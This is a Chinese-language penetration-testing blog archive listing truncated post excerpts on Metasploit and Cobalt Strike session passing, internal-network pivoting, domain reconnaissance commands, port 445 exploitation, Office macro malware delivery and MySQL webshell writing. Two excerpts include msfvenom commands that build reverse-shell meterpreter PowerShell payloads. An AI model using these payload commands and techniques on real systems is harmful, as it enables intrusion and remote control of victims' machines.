把MSF shell派生给Cobaltstrike3.6过程
原因:MSF带着走哪都比较繁重,无法集群工作,然鹅,解决这个问题的时候,发现msf上已经有meterpreter几十个,想要转走到集群的Cobaltstike上,只需要以下几步即可完成,Cobaltstrike 3.0+以后的集群是否...
阅读全文
Archive
Web安全与渗透
MSF之目标内网代理
利用场景:有时候使用msf拿到meterpreter 反弹了,但是想把机器代理到对方的内网里,任何请求也走对方的内网。此刻需要使用到msf的辅助模块 socks4a(msf也有类似lcx功能模块,名字portfwd )pivot是me...
阅读全文
快捷方式powershell反弹到msf
生成一个msf后门msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f psh-reflection > psl....
阅读全文
内网(域)渗透基本命令
内网(域)渗透–基本命令————————————————————————————————————ipconfig /all ------ 查询本机IP段,所在域等
net user ...
阅读全文
445端口之Metasploit集成使用
前言:445对坏人而言是个好端口,对好人而言是个坏端口。(小孩子才分好坏么?我想也是)使用环境:woobuntu(乌云版ubuntu),自带了MSF,不是最新版就sudo msfupdate吧升级一下。下载msf关于445的漏洞模块:...
阅读全文
通过Office宏植入恶意软件
举例:使用msf 生成反弹shell:msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.130 LPORT=443 -f psh-reflection > /var...
阅读全文
Mysql无outfile权限时写shell方法
outfile被禁止,或者写入文件被拦截,root权限,在数据库中操作如下: show variables like '%general%'; // 查看mysql日志路径set global general...
阅读全文